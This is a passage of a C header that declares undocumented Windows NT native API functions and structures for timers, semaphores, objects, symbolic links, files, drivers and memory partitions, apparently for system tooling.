PLARGE_INTEGER Period,\n    _In_ PVOID Parameters);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetTimerEx(\n    _In_ HANDLE TimerHandle,\n    _In_ TIMER_SET_INFORMATION_CLASS TimerSetInformationClass,\n    _Inout_updates_bytes_opt_(TimerSetInformationLength) PVOID TimerSetInformation,\n    _In_ ULONG TimerSetInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenTimer(\n    _Out_ PHANDLE TimerHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryTimer(\n    _In_ HANDLE TimerHandle,\n    _In_ TIMER_INFORMATION_CLASS TimerInformationClass,\n    _Out_writes_bytes_(TimerInformationLength) PVOID TimerInformation,\n    _In_ ULONG TimerInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCancelTimer(\n    _In_ HANDLE TimerHandle,\n    _Out_opt_ PBOOLEAN CurrentState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCancelTimer2(\n    _In_ HANDLE TimerHandle,\n    _In_ PVOID Parameters);\n\n//ref from ph2\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateIRTimer(\n    _Out_ PHANDLE TimerHandle,\n    _In_ ACCESS_MASK DesiredAccess);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetIRTimer(\n    _In_ HANDLE TimerHandle,\n    _In_opt_ PLARGE_INTEGER DueTime);\n\n\n/************************************************************************************\n*\n* Semaphore API.\n*\n************************************************************************************/\n\ntypedef enum _SEMAPHORE_INFORMATION_CLASS {\n    SemaphoreBasicInformation\n} SEMAPHORE_INFORMATION_CLASS;\n\ntypedef struct _SEMAPHORE_BASIC_INFORMATION {\n    LONG CurrentCount;\n    LONG MaximumCount;\n} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateSemaphore(\n    _Out_ PHANDLE SemaphoreHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ LONG InitialCount,\n    _In_ LONG MaximumCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenSemaphore(\n    _Out_ PHANDLE 
SemaphoreHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySemaphore(\n    _In_ HANDLE SemaphoreHandle,\n    _In_ SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,\n    _Out_writes_bytes_(SemaphoreInformationLength) PVOID SemaphoreInformation,\n    _In_ ULONG SemaphoreInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReleaseSemaphore(\n    _In_ HANDLE SemaphoreHandle,\n    _In_ LONG ReleaseCount,\n    _Out_opt_ PLONG PreviousCount);\n\n/************************************************************************************\n*\n* Object and Handle API.\n*\n************************************************************************************/\ntypedef enum _OBJECT_INFORMATION_CLASS {\n    ObjectBasicInformation,\n    ObjectNameInformation,\n    ObjectTypeInformation,\n    ObjectTypesInformation,\n    ObjectHandleFlagInformation,\n    ObjectSessionInformation,\n    ObjectSessionObjectInformation,\n    ObjectSetRefTraceInformation,\n    MaxObjectInfoClass\n} OBJECT_INFORMATION_CLASS;\n\ntypedef struct _OBJECT_DIRECTORY_INFORMATION {\n    UNICODE_STRING Name;\n    UNICODE_STRING TypeName;\n} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;\n\ntypedef struct _OBJECT_BASIC_INFORMATION {\n    ULONG Attributes;\n    ACCESS_MASK GrantedAccess;\n    ULONG HandleCount;\n    ULONG PointerCount;\n    ULONG PagedPoolCharge;\n    ULONG NonPagedPoolCharge;\n    ULONG Reserved[3];\n    ULONG NameInfoSize;\n    ULONG TypeInfoSize;\n    ULONG SecurityDescriptorSize;\n    LARGE_INTEGER CreationTime;\n} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;\n\ntypedef struct _OBJECT_NAME_INFORMATION {\n    UNICODE_STRING Name;\n} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;\n\ntypedef struct _OBJECT_TYPE_INFORMATION {\n    UNICODE_STRING TypeName;\n    ULONG TotalNumberOfObjects;\n    ULONG TotalNumberOfHandles;\n    ULONG TotalPagedPoolUsage;\n    
ULONG TotalNonPagedPoolUsage;\n    ULONG TotalNamePoolUsage;\n    ULONG TotalHandleTableUsage;\n    ULONG HighWaterNumberOfObjects;\n    ULONG HighWaterNumberOfHandles;\n    ULONG HighWaterPagedPoolUsage;\n    ULONG HighWaterNonPagedPoolUsage;\n    ULONG HighWaterNamePoolUsage;\n    ULONG HighWaterHandleTableUsage;\n    ULONG InvalidAttributes;\n    GENERIC_MAPPING GenericMapping;\n    ULONG ValidAccessMask;\n    BOOLEAN SecurityRequired;\n    BOOLEAN MaintainHandleCount;\n    ULONG PoolType;\n    ULONG DefaultPagedPoolCharge;\n    ULONG DefaultNonPagedPoolCharge;\n} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;\n\ntypedef struct _OBJECT_TYPE_INFORMATION_V2 {\n    UNICODE_STRING TypeName;\n    ULONG TotalNumberOfObjects;\n    ULONG TotalNumberOfHandles;\n    ULONG TotalPagedPoolUsage;\n    ULONG TotalNonPagedPoolUsage;\n    ULONG TotalNamePoolUsage;\n    ULONG TotalHandleTableUsage;\n    ULONG HighWaterNumberOfObjects;\n    ULONG HighWaterNumberOfHandles;\n    ULONG HighWaterPagedPoolUsage;\n    ULONG HighWaterNonPagedPoolUsage;\n    ULONG HighWaterNamePoolUsage;\n    ULONG HighWaterHandleTableUsage;\n    ULONG InvalidAttributes;\n    GENERIC_MAPPING GenericMapping;\n    ULONG ValidAccessMask;\n    BOOLEAN SecurityRequired;\n    BOOLEAN MaintainHandleCount;\n    UCHAR TypeIndex;\n    CHAR ReservedByte;\n    ULONG PoolType;\n    ULONG DefaultPagedPoolCharge;\n    ULONG DefaultNonPagedPoolCharge;\n} OBJECT_TYPE_INFORMATION_V2, *POBJECT_TYPE_INFORMATION_V2;\n\ntypedef struct _OBJECT_TYPES_INFORMATION {\n    ULONG NumberOfTypes;\n} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION;\n\n#define OBJECT_TYPES_FIRST_ENTRY(ObjectTypes) (POBJECT_TYPE_INFORMATION)\\\n    RtlOffsetToPointer(ObjectTypes, ALIGN_UP(sizeof(OBJECT_TYPES_INFORMATION), ULONG_PTR))\n\n#define OBJECT_TYPES_NEXT_ENTRY(ObjectType) (POBJECT_TYPE_INFORMATION)\\\n    RtlOffsetToPointer(ObjectType, sizeof(OBJECT_TYPE_INFORMATION) + \\\n    ALIGN_UP(ObjectType->TypeName.MaximumLength, 
ULONG_PTR))\n\ntypedef struct _OBJECT_HANDLE_FLAG_INFORMATION {\n    BOOLEAN Inherit;\n    BOOLEAN ProtectFromClose;\n} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtClose(\n    _In_ _Post_ptr_invalid_ HANDLE Handle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDuplicateObject(\n    _In_ HANDLE SourceProcessHandle,\n    _In_ HANDLE SourceHandle,\n    _In_opt_ HANDLE TargetProcessHandle,\n    _Out_ PHANDLE TargetHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ ULONG HandleAttributes,\n    _In_ ULONG Options);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMakePermanentObject(\n    _In_ HANDLE Handle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMakeTemporaryObject(\n    _In_ HANDLE Handle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetSecurityObject(\n    _In_ HANDLE Handle,\n    _In_ SECURITY_INFORMATION SecurityInformation,\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySecurityObject(\n    _In_ HANDLE Handle,\n    _In_ SECURITY_INFORMATION SecurityInformation,\n    _Out_writes_bytes_opt_(Length) PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _In_ ULONG Length,\n    _Out_ PULONG LengthNeeded);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCompareObjects(\n    _In_ HANDLE FirstObjectHandle,\n    _In_ HANDLE SecondObjectHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryObject(\n    _In_opt_ HANDLE Handle,\n    _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,\n    _Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation,\n    _In_ ULONG ObjectInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationObject(\n    _In_ HANDLE Handle,\n    _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,\n    _In_reads_bytes_(ObjectInformationLength) PVOID ObjectInformation,\n    _In_ ULONG ObjectInformationLength);\n\ntypedef enum _WAIT_TYPE {\n    WaitAll,\n    WaitAny,\n    WaitNotification\n} WAIT_TYPE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitForSingleObject(\n    _In_ HANDLE Handle,\n   
 _In_ BOOLEAN Alertable,\n    _In_opt_ PLARGE_INTEGER Timeout);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitForMultipleObjects(\n    _In_ ULONG Count,\n    _In_reads_(Count) HANDLE Handles[],\n    _In_ WAIT_TYPE WaitType,\n    _In_ BOOLEAN Alertable,\n    _In_opt_ PLARGE_INTEGER Timeout);\n\n/************************************************************************************\n*\n* Time.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySystemTime(\n    _Out_ PLARGE_INTEGER SystemTime);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetSystemTime(\n    _In_opt_ PLARGE_INTEGER SystemTime,\n    _Out_opt_ PLARGE_INTEGER PreviousTime);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryTimerResolution(\n    _Out_ PULONG MaximumTime,\n    _Out_ PULONG MinimumTime,\n    _Out_ PULONG CurrentTime);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetTimerResolution(\n    _In_ ULONG DesiredTime,\n    _In_ BOOLEAN SetResolution,\n    _Out_ PULONG ActualTime);\n\n/************************************************************************************\n*\n* Directory Object API.\n*\n************************************************************************************/\n\n#define OBJDIR_FLAG_SHADOW_PRESENT 0x4\n#define OBJDIR_FLAG_SANDBOX 0x10\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateDirectoryObject(\n    _Out_ PHANDLE DirectoryHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateDirectoryObjectEx(\n    _Out_ PHANDLE DirectoryHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ HANDLE ShadowDirectoryHandle,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenDirectoryObject(\n    _Out_ PHANDLE DirectoryHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryDirectoryObject(\n    _In_ HANDLE DirectoryHandle,\n    _Out_writes_bytes_opt_(Length) PVOID 
Buffer,\n    _In_ ULONG Length,\n    _In_ BOOLEAN ReturnSingleEntry,\n    _In_ BOOLEAN RestartScan,\n    _Inout_ PULONG Context,\n    _Out_opt_ PULONG ReturnLength);\n\n/************************************************************************************\n*\n* Private Namespace API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreatePrivateNamespace(\n    _Out_ PHANDLE NamespaceHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ PVOID BoundaryDescriptor);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenPrivateNamespace(\n    _Out_ PHANDLE NamespaceHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ PVOID BoundaryDescriptor);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeletePrivateNamespace(\n    _In_ HANDLE NamespaceHandle);\n\n/************************************************************************************\n*\n* Symbolic Link API.\n*\n************************************************************************************/\n\ntypedef enum _SYMBOLIC_LINK_INFO_CLASS {\n    SymbolicLinkGlobalInformation = 1,\n    SymbolicLinkAccessMask,\n    MaxnSymbolicLinkInfoClass\n} SYMBOLIC_LINK_INFO_CLASS;\n\ntypedef struct _OBJECT_SYMBOLIC_LINK_V1 { //pre Win10 TH1\n    LARGE_INTEGER CreationTime;\n    UNICODE_STRING LinkTarget;\n    ULONG DosDeviceDriveIndex;\n} OBJECT_SYMBOLIC_LINK_V1, *POBJECT_SYMBOLIC_LINK_V1;\n\ntypedef struct _OBJECT_SYMBOLIC_LINK_V2 { //Win10 TH1/TH2\n    LARGE_INTEGER CreationTime;\n    UNICODE_STRING LinkTarget;\n    ULONG DosDeviceDriveIndex;\n    ULONG Flags;\n} OBJECT_SYMBOLIC_LINK_V2, *POBJECT_SYMBOLIC_LINK_V2;\n\ntypedef struct _OBJECT_SYMBOLIC_LINK_V3 { //Win10 RS1\n    LARGE_INTEGER CreationTime;\n    UNICODE_STRING LinkTarget;\n    ULONG DosDeviceDriveIndex;\n    ULONG Flags;\n    ULONG AccessMask;\n} OBJECT_SYMBOLIC_LINK_V3, *POBJECT_SYMBOLIC_LINK_V3;\n\ntypedef struct 
_OBJECT_SYMBOLIC_LINK_V4 { //Win10 RS2+\n    LARGE_INTEGER CreationTime;\n    union {\n        UNICODE_STRING LinkTarget;\n        struct {\n            PVOID Callback;\n            PVOID CallbackContext;\n        };\n    } u1;\n    ULONG DosDeviceDriveIndex;\n    ULONG Flags;\n    ULONG AccessMask;\n    //long __PADDING__[1];\n} OBJECT_SYMBOLIC_LINK_V4, *POBJECT_SYMBOLIC_LINK_V4; /* size: 0x0028 */\n\ntypedef struct _OBJECT_SYMBOLIC_LINK_V5 { //Win10 21H1+\n    LARGE_INTEGER CreationTime;\n    union {\n        UNICODE_STRING LinkTarget;\n        struct {\n            PVOID Callback;\n            PVOID CallbackContext;\n        };\n    } u1;\n    ULONG DosDeviceDriveIndex;\n    ULONG Flags;\n    ULONG AccessMask;\n    ULONG IntegrityLevel;\n} OBJECT_SYMBOLIC_LINK_V5, * POBJECT_SYMBOLIC_LINK_V5; /* size: 0x0028 */\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateSymbolicLinkObject(\n    _Out_ PHANDLE LinkHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ PUNICODE_STRING LinkTarget);\n\nNTSYSAPI\nNTSTATUS\nWINAPI\nNtOpenSymbolicLinkObject(\n    _Out_ PHANDLE LinkHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySymbolicLinkObject(\n    _In_ HANDLE LinkHandle,\n    _Inout_ PUNICODE_STRING LinkTarget,\n    _Out_opt_ PULONG  ReturnedLength);\n\nNTSTATUS\nNTAPI\nNtSetInformationSymbolicLink(\n    _In_ HANDLE LinkHandle,\n    _In_ SYMBOLIC_LINK_INFO_CLASS SymbolicLinkInformationClass,\n    _In_reads_bytes_(SymbolicLinkInformationLength) PVOID SymbolicLinkInformation,\n    _In_ ULONG SymbolicLinkInformationLength);\n\n/************************************************************************************\n*\n* File API (+Driver&HotPatch).\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateFile(\n    _Out_ PHANDLE FileHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ 
POBJECT_ATTRIBUTES ObjectAttributes,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_opt_ PLARGE_INTEGER AllocationSize,\n    _In_ ULONG FileAttributes,\n    _In_ ULONG ShareAccess,\n    _In_ ULONG CreateDisposition,\n    _In_ ULONG CreateOptions,\n    _In_reads_bytes_opt_(EaLength) PVOID EaBuffer,\n    _In_ ULONG EaLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateNamedPipeFile(\n    _Out_ PHANDLE FileHandle,\n    _In_ ULONG DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ ULONG ShareAccess,\n    _In_ ULONG CreateDisposition,\n    _In_ ULONG CreateOptions,\n    _In_ ULONG NamedPipeType,\n    _In_ ULONG ReadMode,\n    _In_ ULONG CompletionMode,\n    _In_ ULONG MaximumInstances,\n    _In_ ULONG InboundQuota,\n    _In_ ULONG OutboundQuota,\n    _In_opt_ PLARGE_INTEGER DefaultTimeout);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateMailslotFile(\n    _Out_ PHANDLE FileHandle,\n    _In_ ULONG DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ ULONG CreateOptions,\n    _In_ ULONG MailslotQuota,\n    _In_ ULONG MaximumMessageSize,\n    _In_ PLARGE_INTEGER ReadTimeout);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeviceIoControlFile(\n    _In_ HANDLE FileHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ ULONG IoControlCode,\n    _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,\n    _In_ ULONG InputBufferLength,\n    _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,\n    _In_ ULONG OutputBufferLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFsControlFile(\n    _In_ HANDLE FileHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ ULONG FsControlCode,\n    _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,\n    _In_ ULONG 
InputBufferLength,\n    _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,\n    _In_ ULONG OutputBufferLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenFile(\n    _Out_ PHANDLE FileHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ ULONG ShareAccess,\n    _In_ ULONG OpenOptions);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReadFile(\n    _In_ HANDLE FileHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _Out_writes_bytes_(Length) PVOID Buffer,\n    _In_ ULONG Length,\n    _In_opt_ PLARGE_INTEGER ByteOffset,\n    _In_opt_ PULONG Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWriteFile(\n    _In_ HANDLE FileHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_reads_bytes_(Length) PVOID Buffer,\n    _In_ ULONG Length,\n    _In_opt_ PLARGE_INTEGER ByteOffset,\n    _In_opt_ PULONG Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLockFile(\n    _In_ HANDLE FileHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ PLARGE_INTEGER ByteOffset,\n    _In_ PLARGE_INTEGER Length,\n    _In_ ULONG Key,\n    _In_ BOOLEAN FailImmediately,\n    _In_ BOOLEAN ExclusiveLock);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnlockFile(\n    _In_ HANDLE FileHandle,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ PLARGE_INTEGER ByteOffset,\n    _In_ PLARGE_INTEGER Length,\n    _In_ ULONG Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFlushBuffersFile(\n    _In_ HANDLE FileHandle,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationFile(\n    _In_ HANDLE FileHandle,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ PVOID FileInformation,\n    _In_ ULONG Length,\n    _In_ 
FILE_INFORMATION_CLASS FileInformationClass);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeleteFile(\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationFile(\n    _In_ HANDLE FileHandle,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _Out_writes_bytes_(Length) PVOID FileInformation,\n    _In_ ULONG Length,\n    _In_ FILE_INFORMATION_CLASS FileInformationClass);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryFullAttributesFile(\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _Out_ PFILE_NETWORK_OPEN_INFORMATION FileInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryDirectoryFile(\n    _In_ HANDLE FileHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _Out_writes_bytes_(Length) PVOID FileInformation,\n    _In_ ULONG Length,\n    _In_ FILE_INFORMATION_CLASS FileInformationClass,\n    _In_ BOOLEAN ReturnSingleEntry,\n    _In_opt_ PUNICODE_STRING FileName,\n    _In_ BOOLEAN RestartScan);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryDirectoryFileEx(\n    _In_ HANDLE FileHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _Out_writes_bytes_(Length) PVOID FileInformation,\n    _In_ ULONG Length,\n    _In_ FILE_INFORMATION_CLASS FileInformationClass,\n    _In_ ULONG QueryFlags,\n    _In_opt_ PUNICODE_STRING FileName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryEaFile(\n    _In_ HANDLE FileHandle,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _Out_writes_bytes_(Length) PVOID Buffer,\n    _In_ ULONG Length,\n    _In_ BOOLEAN ReturnSingleEntry,\n    _In_reads_bytes_opt_(EaListLength) PVOID EaList,\n    _In_ ULONG EaListLength,\n    _In_opt_ PULONG EaIndex,\n    _In_ BOOLEAN RestartScan);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetEaFile(\n    _In_ HANDLE FileHandle,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_bytecount_(Length) PVOID Buffer,\n    _In_ 
ULONG Length);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryVolumeInformationFile(\n    _In_ HANDLE FileHandle,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _Out_writes_bytes_(Length) PVOID FsInformation,\n    _In_ ULONG Length,\n    _In_ FS_INFORMATION_CLASS FsInformationClass);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryQuotaInformationFile(\n    _In_ HANDLE FileHandle,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _Out_writes_bytes_(Length) PVOID Buffer,\n    _In_ ULONG Length,\n    _In_ BOOLEAN ReturnSingleEntry,\n    _In_reads_bytes_opt_(SidListLength) PVOID SidList,\n    _In_ ULONG SidListLength,\n    _In_opt_ PSID StartSid,\n    _In_ BOOLEAN RestartScan);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetQuotaInformationFile(\n    _In_ HANDLE FileHandle,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_reads_bytes_(Length) PVOID Buffer,\n    _In_ ULONG Length);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReadFileScatter(\n    _In_ HANDLE FileHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ PFILE_SEGMENT_ELEMENT SegmentArray,\n    _In_ ULONG Length,\n    _In_opt_ PLARGE_INTEGER ByteOffset,\n    _In_opt_ PULONG Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWriteFileGather(\n    _In_ HANDLE FileHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ PFILE_SEGMENT_ELEMENT SegmentArray,\n    _In_ ULONG Length,\n    _In_opt_ PLARGE_INTEGER ByteOffset,\n    _In_opt_ PULONG Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtNotifyChangeDirectoryFile(\n    _In_ HANDLE FileHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _Out_writes_bytes_(Length) PVOID Buffer,\n    _In_ ULONG Length,\n    _In_ ULONG CompletionFilter,\n    _In_ BOOLEAN WatchTree);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCopyFileChunk(\n   
 _In_ HANDLE SourceHandle,\n    _In_ HANDLE DestinationHandle,\n    _In_opt_ HANDLE EventHandle,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ ULONG Length,\n    _In_ PLARGE_INTEGER SourceOffset,\n    _In_ PLARGE_INTEGER DestOffset,\n    _In_opt_ PULONG SourceKey,\n    _In_opt_ PULONG DestKey,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadDriver(\n    _In_ PUNICODE_STRING DriverServiceName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnloadDriver(\n    _In_ PUNICODE_STRING DriverServiceName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadHotPatch(\n    _In_ PUNICODE_STRING HotPatchName,\n    _Reserved_ ULONG LoadFlag);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtManageHotPatch(\n    _In_ ULONG HotPatchInformationClass,\n    _Out_writes_bytes_opt_(HotPatchInformationLength) PVOID HotPatchInformation,\n    _In_ ULONG HotPatchInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\n/************************************************************************************\n*\n* Section API (+MemoryPartitions).\n*\n************************************************************************************/\n\n#define MEM_EXECUTE_OPTION_ENABLE 0x1\n#define MEM_EXECUTE_OPTION_DISABLE 0x2\n#define MEM_EXECUTE_OPTION_DISABLE_THUNK_EMULATION 0x4\n#define MEM_EXECUTE_OPTION_PERMANENT 0x8\n#define MEM_EXECUTE_OPTION_EXECUTE_DISPATCH_ENABLE 0x10\n#define MEM_EXECUTE_OPTION_IMAGE_DISPATCH_ENABLE 0x20\n#define MEM_EXECUTE_OPTION_VALID_FLAGS 0x3f\n\ntypedef enum _MEMORY_PARTITION_INFORMATION_CLASS {\n    SystemMemoryPartitionInformation,\n    SystemMemoryPartitionMoveMemory,\n    SystemMemoryPartitionAddPagefile,\n    SystemMemoryPartitionCombineMemory,\n    SystemMemoryPartitionInitialAddMemory,\n    SystemMemoryPartitionGetMemoryEvents,\n    SystemMemoryPartitionSetAttributes,\n    SystemMemoryPartitionNodeInformation,\n    SystemMemoryPartitionCreateLargePages,\n    SystemMemoryPartitionDedicatedMemoryInformation,\n    SystemMemoryPartitionOpenDedicatedMemory,\n    
